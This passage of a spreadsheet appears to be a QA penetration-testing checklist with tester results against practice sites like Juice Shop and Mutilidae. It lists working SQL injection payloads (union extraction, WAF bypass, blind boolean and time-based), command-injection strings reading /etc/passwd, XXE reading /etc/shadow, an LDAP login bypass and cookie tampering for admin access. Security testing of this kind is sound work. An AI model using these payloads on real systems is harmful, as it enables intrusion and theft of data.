    <t>Navigate to the URL"https://juice-shop.herokuapp.com/" , and noticed there is # symbol is present as a parameter in URL and then searched "hello" keyword by entering it in search field,and then as a result "hello" is reflected in url .</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_03</t>
  </si>
  <si>
    <t>Parameter Pollution on URL parameters</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if entered data in the modified URL is being selected </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the browser and go to the website and see the url with parameters, Ex: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">http://127.0.0.1:631/admin/?kerberos=alvin&amp;datafiled=blade 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>2.Check all the links in the website which has some fields on URL to input some data like "search","first name","lastname" etc (You can try this especially on search fields and many places where you have multiple parameters in the URL)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Now we need to modify url in such a way that it should not select the first value given in it like 
"kerberos=alvin". The modification should be in such a way it should select the second value provided by us on url. Ex:
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>http://127.0.0.1:631/admin/?kerberos=alvin&amp;datafield=blade&amp;kerberos=hacked</t>
    </r>
  </si>
  <si>
    <t>Modified data in url should not be selected</t>
  </si>
  <si>
    <t>Navigated to the URL:"https://juice-shop.herokuapp.com/"  searched "apple juice" key word in search field. so "apple juice" is reflected in url. then key word " apple juice " changes to "apple" " juice" in url it did not affect any thing that is selected in web page and in search field.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_04</t>
  </si>
  <si>
    <t>Buffer Overflow on all input fileds</t>
  </si>
  <si>
    <t>Verify if web application or browser stops responding due to  having no max limit on input fields</t>
  </si>
  <si>
    <t>Now we need to provide some junk data and fill all the input fields one by one to their maximum extent (max limit input=?) until this causes the web application to stop responding</t>
  </si>
  <si>
    <t>Entered data should not cause the app or browser to stop responding and there should be restriction set at the field level on number characters/input allowed</t>
  </si>
  <si>
    <t>FAIL</t>
  </si>
  <si>
    <t>yes</t>
  </si>
  <si>
    <t>Search field should have data limit, It is accepting any number of characters</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_05</t>
  </si>
  <si>
    <t>Click Jacking on all web pages with input field</t>
  </si>
  <si>
    <t>Verify if user is able to open the web pages in a frame</t>
  </si>
  <si>
    <t>1. Open the browser and go to the web site. Take the website URL
2. Now open a notepad and paste the below code. Replace the sample URL mentioned below with the website URL under test. Now save the notepad as HTML and open it in new browser
3. Check if you are able to open the website in a frame
&lt;html&gt;
   &lt;head&gt;
     &lt;title&gt;Clickjack test page&lt;/title&gt;
   &lt;/head&gt;
   &lt;body&gt;
     &lt;p&gt;Website is vulnerable to clickjacking!&lt;/p&gt;
     &lt;iframe src="https://any.com" width="500" height="500"&gt;&lt;/iframe&gt;
   &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Website should not be visible in a frame</t>
  </si>
  <si>
    <t>test case steps is easy to understand and apply</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_06</t>
  </si>
  <si>
    <t>SQL Injection on input parameters(POST Based)</t>
  </si>
  <si>
    <t>Verify if entered data in the input field is throwing a database related error</t>
  </si>
  <si>
    <t>1.Open the browser and go to the website
2.Check all the links in the website which has some fields to input some data like "search","first name","lastname" etc</t>
  </si>
  <si>
    <t>Steps has to be clear</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>1. Enter data \ in all the input fields on the page one by one.Verify if "\" throws an error on webpage like the one mentioned in the bold (The error could also differ based on the SQL server which is used):-
   "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>You have an error in your sql syntax. check the manual that corresponds to your MYSQL server version for the right      syntax to use near "\" Limit 0,1' at line 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>"
2. Now we balance the query:- if you see the \ enetered in the field displayed in the error as "\" then you need to close the statement with double quotes as mentioned below. 
"   --     // Note: the payload for post based sql is --space, that is tap spacebar after -- once
If it is handled with single quote like '\'
'   --      // Note: the payload for post based sql is --space, that is tap spacebar after -- once
If the above option doesn't work, then use below statements
"   #
'   #
If the SQL error displayed before disappears, then we have successfully balanced the query</t>
    </r>
  </si>
  <si>
    <t>No SQL error message should be displayed when user enter \ in the field</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Now we get to verify the number of columns by using below payload
' order by 10# </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>or</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ' order by 10--+ (Keep on reducing the order by number from 10 to 1 to verify how many columns are available)
or
" order by 10# or " order by 99--+  (Keep on reducing the order by number from 10 to 1 to verify how many columns are available)
The above mentioned payload will not throw any error if the number of columns were right. (Ex: If you put order by 100, it may throw error if the table doesn't have 100 columns and if you enter order by 4, it may not throw error as table has 4 columns)
Once you figure out number columns in the table, use the below command to display the numer of vulnerable coulmns:- 
' union all select 1,2,3,.....so on#
</t>
    </r>
  </si>
  <si>
    <t>No error should be displayed with the wrong syntax message</t>
  </si>
  <si>
    <t>Need help on this i am not sure how we can do this with url</t>
  </si>
  <si>
    <t xml:space="preserve">If the union select statements doesn't throw an error, we try to extract database and version number with command:-
' union all select database(),user()#
</t>
  </si>
  <si>
    <t>No error should be displayed with the wrong synatx message</t>
  </si>
  <si>
    <t>SQL Injection on URL parameters(GET Based)</t>
  </si>
  <si>
    <t>Verify if entered data in the URL is throwing a database related error</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields on url to input like :-
http://mutilidae.com/?id=1</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>1. Enter data  \  in the url after id parameter like http://mutilidae.com/?id=1\
Verify if  by putting forwardslash \ after id parameter throws an error on webpage like the one mentioned below:-
 "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>You have an error in your sql syntax. check the manula that corresponds to your MYSQL server version for the right      syntax to use near "\" Limit 0,1' at line 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">"
Note: The error could also differ based on the SQL server which is used
2. Now we balance the query:- if you see \  displayed in the error as "\" so you close the statement with double quotes.
as mentioned below. 
"   --+
If it is handled with single quote like '\'
'   --+
If the above option doesn't work, then use below statements
"   #
'   #
If the SQL error displayed before disappears, then we have successfully balanced the query
if you see error with '\' ,  then you close the statement with ' --+ </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Now we verify the number of columns in the website using "order by" command shown below :-
If the website has 100 columns we use:-
' order by 100# or ' order by 100--+(Keep on reducing the order by number from 100 to 1 to verify how many columns are available)
If the website has 10 columns, then:-
" order by 10# or " order by 1--+  (Keep on reducing the order by number from 10 to 1 to verify how many columns are available)
The above mentioned payload will not throw any error if the number of columns are right. (Ex: If you put order by 200, it may throw error if the table doesn't have 200 columns and if you enter order by 4, it may not throw error as table has 4 columns)
Once you figure out number columns in the table, use the below command to display the numer of vulnerable coulmns:- 
' union all select 1,2,3,.....so on#
</t>
  </si>
  <si>
    <t>If the union select statements throw an error with vulnerable coulmns numbers, then we try to extract database and version number with command:-
' union all select database(),user()--+  // if coulumn 1 and 2 are vulnerable
or 
' union all select 1,2,database(),user()--+ //if columns 3,4 are vulnerable</t>
  </si>
  <si>
    <t>WAF Bypassing for SQLI</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if user is able to bypass WAF by </t>
  </si>
  <si>
    <t xml:space="preserve">1. Enter data  \  in the url after id parameter like http://mutilidae.com/?id=1\
Verify if  by putting forwardslash \ after id parameter throws an error on webpage like the one mentioned below:-
 "You have an error in your sql syntax. check the manula that corresponds to your MYSQL server version for the right      syntax to use near "\" Limit 0,1' at line 1"
Note: The error could also differ based on the SQL server which is used
2. Now we balance the query:- if you see \  displayed in the error as "\" so you close the statement with double quotes.
as mentioned below. 
"   --+
If it is handled with single quote like '\'
'   --+
If the above option doesn't work, then use below statements
"   #
'   #
If the SQL error displayed before disappears, then we have successfully balanced the query
if you see error with '\' ,  then you close the statement with ' --+ </t>
  </si>
  <si>
    <t>No error was displayed and all the steps are clear</t>
  </si>
  <si>
    <t>If browser throws error like "Not Acceptable", "Forbidden", "403", verify if the website accepts the crafted request shown below:-
' /*!12345union*/ all select 1,2,3 --+
if above payload does not work use:- ' /*!12345union*//*!12345all*/ select 1,2,3 --+</t>
  </si>
  <si>
    <t>WAF should not allow crafted sqli request</t>
  </si>
  <si>
    <t>Crafted SQLI not allowed and the steps are clear</t>
  </si>
  <si>
    <t>Blind SQLi Boolean based (Get)</t>
  </si>
  <si>
    <t xml:space="preserve">1. Enter data  \  in the url after id parameter like http://mutilidae.com/?id=1\
Verify if  by putting forwardslash \ after id parameter throws an error. If not, then this could be blind boolean based
2. Now we balance the query as in blind boolean based user would not see the error like other sqli exmples. So in this we put ' , " , ") , ') , "/) , '/) e.t.c manually followed by --+  to fix the query
If it is handled properly we add "and 1=1 --+" to finish the statement like shown below:-
http://mutilidae.com/?id=1' and 1=1 --+   //true, some content would be displayed on website
http://mutilidae.com/?id=1' and 1=2 --+     //false, no content would be displayed on website
or
http://mutilidae.com/?id=1') and 1=1 --+
If the SQL error displayed before disappears, then we have successfully balanced the query
</t>
  </si>
  <si>
    <t xml:space="preserve">Now we get to verify the database name by using below payload:-
' ?id=1' and substring(database(),1,1)="s"--+ (Keep on advancing the letters from a-z until you get some content on website, if you get error, nothing will be displayed)
?id=1' and substring(database(),2,1)="e"--+
?id=1' and substring(database(),3,1)="c"--+ 
The above mentioned payload will display some website content if the substring letter compared with it is right. 
Once you figure out the database name by comparing the substring with letters, we can exploit it with sqlmap
</t>
  </si>
  <si>
    <t>Blind Time Based SQLI (Get)</t>
  </si>
  <si>
    <t>1. Enter data  \  in the url after id parameter like http://mutilidae.com/?id=1\
if you don't get any errors, their can be the possibility of Blind Time Based SQLI
Since \ won't give any error, use ?id=1' and sleep(10) --+
http://mutilidae.com/?id=1' and sleep(10) --+
if application sleeps for 10 secs it has ' after 1 if it doesn't then app won't sleep
2. Repeat the above process for " , ') , ") , "/) , '/) , /)
3. Once the query is fixed, we try to find the database name using below command
and sleep(10) and substring(database()1,1)="a" --+  //  from a-z
once you find the first letter of data base name, go for the second letter and so on
and sleep(10) and substring(database()2,1)="e" --+  // from a-z
Once you figure out the database name by comparing the substring with letters, we can exploit it with sqlmap</t>
  </si>
  <si>
    <t>Blind SQLi Boolean based (Post)</t>
  </si>
  <si>
    <t>1. Enter data  \  in the input fileds of webpage one by one 
Verify if  by putting forwardslash \ in the input fileds throws an error. If not, then this could be blind boolean based
2. Now we balance the query, as in blind boolean based user would not see the error like other sqli exmples. So in this we put ' , " , ") , ') , "/) , '/) e.t.c manually followed by --  or #  to fix the query
If it is handled properly we add "or 1=1 --+" to finish the statement like shown below:-
' or 1=1 --+   //true, some content would be displayed on website
' and 1=2 --+     //false, no content would be displayed on website
or
') or 1=1 --+
If the SQL error displayed before disappears, then we have successfully balanced the query</t>
  </si>
  <si>
    <t>Now we get to verify the database name by using below payload:-
' OR substring(database(),1,1)="s"#   //  from a-z
' or substring(database(),1,2)="e"#   //  from a-z
The above mentioned payload will display some website content if the substring letter compared with it is right. 
Once you figure out the database name by comparing the substring with letters, we can exploit it with sqlmap</t>
  </si>
  <si>
    <t>Blind Time Based SQLI (Post)</t>
  </si>
  <si>
    <t>1. Enter data  \  in the input fileds of webpage one by one 
Verify if  by putting forwardslash \ in the input fileds throws an error. If not, then this could be blind time based 
Since \ won't give any error, ' and sleep(10) --+
' and sleep(10) --+
if application sleeps for 10 secs it has ' after 1 if it doesn't then app won't sleep
2. Repeat the above process for " , ') , ") , "/) , '/) , /)
3. Once the query is fixed, we try to find the database name using below command
' OR sleep(10) and 1=1# 
' OR sleep(10) and substring(database(),1,1)="s"# 
' OR sleep(10) and substring(database(),2,1)="e"# 
' OR sleep(10) and substring(database(),3,1)="c"# 
' OR sleep(10) and substring(database(),4,1)="u"#   // from a-z
Once you figure out the database name by comparing the substring with letters, we can exploit it with sqlmap</t>
  </si>
  <si>
    <t>able to execute test case properly</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_07</t>
  </si>
  <si>
    <t>File upload on a website</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if user is able to upload any malicious file on a website </t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has pages where you can upload some doc or image</t>
  </si>
  <si>
    <t xml:space="preserve">1. Create any file using notepad with extensions .py or .php like email.py or shell.php
2. Verify if you are able to upload those files on the webpages  </t>
  </si>
  <si>
    <t>Website should not allow user to upload malicious files</t>
  </si>
  <si>
    <t>Able to upload  files successfully</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_08</t>
  </si>
  <si>
    <t>URL redirection on a website</t>
  </si>
  <si>
    <t>Verify if user is able to redirect to other webisite using a payload</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site like https://any.com
  Use payload "/" or "//" followed by name of the website like "any.com" to get redirected to " bing.com"
The following will be our payload:-
https://any.com/bing.com
or
https://any.com//bing.com
If user gets redirected to bing.com, url redirection is confirmed</t>
  </si>
  <si>
    <t>User should not  get redirected to bing.com</t>
  </si>
  <si>
    <t>User is not redirected to bing.com</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_09</t>
  </si>
  <si>
    <t>Command Injection on input parameters</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if shell commands are getting executed in input fields interacting with operating system </t>
  </si>
  <si>
    <t xml:space="preserve"> Verify if you are able to execute shell commands
1.Open the browser and go to the website
2. Find any input field and enter operating system commands mentioned below, one by one in the input field and verify if user is able to see any system related information like files, directory etc.
example:- ;ls , &amp;&amp;ls , ||ls , ^ls , &amp;ls , |ls , %0Dls , %0Als , \nls , &lt;ls
               ;pwd , &amp;&amp;pwd , ||pwd , ^pwd , &amp;pwd , |pwd , %0Dpwd , %0Apwd , \npwd , &lt;pwd
               ;dir , &amp;&amp;dir , ||dir , ^dir , &amp;dir , |dir , %0Ddir , %0Adir , \ndir , &lt;dir
               ;cat /etc/passwd , &amp;&amp;cat /etc/passwd , ||cat /etc/passwd , ^cat /etc/passwd , &amp;cat /etc/passwd , |cat /etc/passwd , %0Dcat /etc/passwd , %0Acat /etc/passwd , \ncat /etc/passwd , &lt;cat /etc/passwd
</t>
  </si>
  <si>
    <t>Shell commands should not be executed</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_10</t>
  </si>
  <si>
    <t>Broken Access Control</t>
  </si>
  <si>
    <t>Could not understand how to execute</t>
  </si>
  <si>
    <t>Broken Access Control on all the webpages after logging out of the site</t>
  </si>
  <si>
    <t>Verify if the user is able to access all the pages of website even after logging out of the site</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2. Login to the website and visit all pages. Please make a note all the pages / URLs which can be visited only be the logged in user
3. Now log out of the web application and try accessing thos URLs and check if you can access it</t>
  </si>
  <si>
    <t>Guest user should not be able to access any of those web pages which only a logged in user can access</t>
  </si>
  <si>
    <t>Guest user is able to navigate to some of he URL's</t>
  </si>
  <si>
    <t>Guest user is able to navigate to the following URL:
https://juice-shop.herokuapp.com/#/basket - Fail
https://juice-shop.herokuapp.com/#/recycle - Fail
https://juice-shop.herokuapp.com/#/track-order - Fail
https://juice-shop.herokuapp.com/#/delivery-method - Fail
https://juice-shop.herokuapp.com/#/payment/shop - Fail
https://juice-shop.herokuapp.com/#/wallet - Fail
https://juice-shop.herokuapp.com/#/saved-payment-methods - Fail
https://juice-shop.herokuapp.com/#/complain - Fail
https://juice-shop.herokuapp.com/#/privacy-security/data-export - Fail
https://juice-shop.herokuapp.com/#/privacy-security/change-password - Fail</t>
  </si>
  <si>
    <t>Broken Access Control testing by trying to access the admin portal by changing the URL</t>
  </si>
  <si>
    <t>Verify if the user is able to access the admin portal by changing the URL</t>
  </si>
  <si>
    <t>1. Open the browser and go to the website
2. Login to the website by entering normal user credentials
3. Now change the url as mentioned below and check if user can access admin portal
(Ex 1: Change the https://www.test.com/user URL to https://www.test.com/admin)
(Ex 2: Change the https://test.com/app/accountInfo?acct=useraccount to https://example.com/app/accountInfo?acct=admin)
(Ex 3: Change the https://test.com/app/getappInfo to http://example.com/app/getadmininfo)
(Ex 4: Change the https://test.com/#/user to http://example.com/#/administration)</t>
  </si>
  <si>
    <t>User should not be able to access unauthorised pages by changing the URL</t>
  </si>
  <si>
    <t>User is not able to access unauthorised pages by changing URL</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_11</t>
  </si>
  <si>
    <t>Broken Authentication/Session Management</t>
  </si>
  <si>
    <t xml:space="preserve">Session Timeout </t>
  </si>
  <si>
    <t xml:space="preserve">Verify if session time out after 30 mins </t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2. Login onto the portal and go to some page like update profile.
3. Leave the session as it is without doing any activity for atleast 30 mins or 1 hour.
4. After 1 hour come back to the same browser or session.
</t>
  </si>
  <si>
    <t>Session should get expired, if not then there is session timeout vulnerability.</t>
  </si>
  <si>
    <t>Session Management on password reset using same link twice</t>
  </si>
  <si>
    <t>Verify if user is able to reset the password using same link twice</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2.Provide the user name and Click on forgot password link.
3.Go to the mail and click on forgot password link to reset password.
4.Change the password and login onto the portal with new password.
5. Go to the mail again and try changing the password again using the same link
</t>
  </si>
  <si>
    <t>Once used, forgot password link should get expired and user should not be able to change the password again using the same link.</t>
  </si>
  <si>
    <t>Session management on password reset using previous link</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if user is able to reset the password using previous link </t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2.Provide the user name and Click on forgot password link/button.
3.Click on forgot password link/button again.
4.Go to the mail where user should recieve 2 links to change the password 
5. Use second link to reset the password, login onto the portal and logout.
6. Then go to the mail again and try first link to reset the password.
</t>
  </si>
  <si>
    <t>User should not be able to reset the password using first link, if he is able to reset then there is a session management.</t>
  </si>
  <si>
    <t>Session management after updating mail id</t>
  </si>
  <si>
    <t>Verify if user is able to reset his password after updating his mail id.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox browser and launch the url.
2.Provide the user name and Click on forgot password link/button.
3.Then login onto the portal using old password.
4. Update your email id field and enter new email id and logout.
5.Go to the mail, try resetting your password using the link.
</t>
  </si>
  <si>
    <t>User should not be able to reset the password using recieved link now, if he is able to reset then there is a session management.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_12</t>
  </si>
  <si>
    <t>Insecure Data Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Sensitive information Repositories  like .git/ , .svn/ , ./hg , .gitignore/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if user is able to find the sensitive data repositories  like .git/ , .svn/ , ./hg , .gitignore/ </t>
  </si>
  <si>
    <t>1.Open the firefox browser and go to the web site like https://any.com
  Add  .git/ or .svn/ or ./hg  or .gitignore/  followed by name of the website like "any.com" 
The following will be our payload:-
https://any.com/.git/
or
https://any.com/.svn/
or 
https://any.com/.gitignore/
or
https://any.com/.hg/
Enter above payloads in the URL's and 
Verify if any sensitive information is being displayed including source code etc.</t>
  </si>
  <si>
    <t xml:space="preserve">.git/ , .svn/ , ./hg , .gitignore/ repositories should not be displayed </t>
  </si>
  <si>
    <t>Cache-Control Misconfiguration Leads to Sensitive Information Leakage</t>
  </si>
  <si>
    <t>Verify once session gets terminated, no data is of the previous session is accessible.</t>
  </si>
  <si>
    <t>1) Launch the firefox browser and Login to the URL
2) Navigate to Any Vulnerable Page Containing Sensitive Info
including payments, account , billing etc.
3) After you're done, just log out directly from this page
4) Once logged out, hit the 'Back' Button in browser</t>
  </si>
  <si>
    <t>User should not land back to the authenticated page and should not be able to see the sensitive information.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_13</t>
  </si>
  <si>
    <t>External Entity Injection (XXE)</t>
  </si>
  <si>
    <t>XXE on input field</t>
  </si>
  <si>
    <t>Verify if  a web application is having a poorly crafted xml parser through input field</t>
  </si>
  <si>
    <t>1.Open the firefox browser and go to the web site
2. Check all the links in the website which has some fields to input some data like "search","first name","lastname" etc
3. Create your own xml tags in input fields like the examples shown below:-
&lt;course&gt;pentest&lt;/course&gt;
&lt;foo&gt;hacked&lt;/foo&gt;
4. Verify if the website responds back by displaying the contents in the tag ("pentest" or "hacked")</t>
  </si>
  <si>
    <t>Website should not reflect the crafted data</t>
  </si>
  <si>
    <t>If the website reflects the crafted data then use the following payloads to confirm XXE:-
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///etc/shadow" &gt;]&gt;
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///c:/boot.ini" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>Website should not display the system internal files</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_14</t>
  </si>
  <si>
    <t>LDAP injection</t>
  </si>
  <si>
    <t>LDAP Injection on Login form</t>
  </si>
  <si>
    <t>Verify if user is able to bypass Authentication</t>
  </si>
  <si>
    <t xml:space="preserve">
1.Open the firefox browser and go to the web site.
2. In a search box, enter  “*”  the system may return all the user objects on the LDAP base.
3. Click on login button, enter
username = *)(uid=*))(|(uid=*
password = password
If there is no input validation the user can insert the following injection in the username and password fields to bypass authentication.
</t>
  </si>
  <si>
    <t>User should not be able to bypass authentication.</t>
  </si>
  <si>
    <t>Directory Traversal</t>
  </si>
  <si>
    <t>Directory Traversal in URL</t>
  </si>
  <si>
    <t>Verify if user can traverse through the directories in the URL.</t>
  </si>
  <si>
    <t>1.Open the firefox browser and go to the web site like https://any.com
  Traverse by adding "../" and "test" in any parameter of the url 
For example -
https://any.com/users/password/new?invitation_token=/../../../../../../test
Verify if user is able to see any critical files while traversing.</t>
  </si>
  <si>
    <t>User should not be able to see system or root files.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_15</t>
  </si>
  <si>
    <t>Authentication</t>
  </si>
  <si>
    <t>Login as admin using cookies</t>
  </si>
  <si>
    <t>Verify if user can login as admin using cookies</t>
  </si>
  <si>
    <t xml:space="preserve">Option1 - ( Using web developer tool option )
1.Open the firefox browser and go to the web site
2. Login with valid credentials.
3. Click on the Menu button on the right top and  select Web Developer option -&gt; then select Storage inspector and  go to cookies-&gt; select the url and 
check if the entered username is reflected in the value or any other field.
4. If it is reflected , change the username to admin in the cookies and refresh the windowas well as the browser.
5. Verify if user is able to login as admin using cookies.
Option2 - (Using Burp Suite)
1.Open the firefox browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser register and capture the request in burp.
3. In burp Forward the request until we see Cookie: auth=entered username.
4. If it is reflected , change the username to admin in the cookie and forward the request and turn off the intercept.
5. Verify if user is able to login as admin.
</t>
  </si>
  <si>
    <t>User should not be able to use the cookies to login as admin.</t>
  </si>
  <si>
    <t>Login as admin using encoded cookies</t>
  </si>
  <si>
    <t>Verify if user can login as admin using encoded cookies</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the web site
2. Login with valid credentials.
3. Click on the Menu button on the right top and  select Web Developer option -&gt; then select Storage inspector and  go to cookies-&gt; select the url and 
check if MD5 hashed  , SHA1, SHA2 etc string is reflected in the value or any other field. 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">for eg- 21232f297a57a5a743894a0e4a801fc3
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
4. If it is reflected , copy the string and google  it, check  the value in MD5  conversion and reverse look up. If it is showing as your username then look for the hashed value of admin , copy and replace it with your username in the cookies.Refresh the windowas well as the browser.
5. Verify if user is able to login as admin using hashed cookies.</t>
    </r>
  </si>
  <si>
    <t>User should not be able to use the hashed cookies to login as admin.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_16</t>
  </si>
  <si>
    <t>Authorization</t>
  </si>
  <si>
    <t>Access information of other users</t>
  </si>
  <si>
    <t>Verify if user can access information of other users</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox  browser and go to the web site for eg https://any.com
2. Login with valid credentials.
3. Check if Url is having any numbers in it, if yes then try incrementing those and verify if user can access information of other users.
For eg.http://ptl-1bb578a0-fed6d1c9.libcurl.st/infos/1 increment by 1 then 2,3  and so on.
</t>
  </si>
  <si>
    <t>User should not be able to access information of other users.</t>
  </si>
  <si>
    <t>Access json code using curl</t>
  </si>
  <si>
    <t>Verify if user can access json code using curl or by appended .json in the url</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Precondition- Linux system with curl should be available.
1.Open the firefox  browser and go to the web site for eg https://any.com
2. Login with valid credentials.
3. At the end of the url add  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">.json 
eg.  https://any.com.json
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">or 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> We can also use command prompt incase .json is filtered out by the site.
 Command to be used :
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"># curl  https://any.com -H  'Accept: application/json'
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Verify if user can access json code using curl or by appended .json in the url
</t>
    </r>
  </si>
  <si>
    <t>User should not be able to access json code using curl or by appended .json in the url</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_17</t>
  </si>
  <si>
    <t>Code Execution</t>
  </si>
  <si>
    <t>Code Execution when Eval() function is being displayed in the error.</t>
  </si>
  <si>
    <t>Verify if user is able to execute system commands  when Eval() function is being displayed in the error.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Open the firefox  browser and go to the website
2.Add " codes at the end of the url for eg. - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">demo.libcurl.so?name=hacker" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> and if we get below error
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
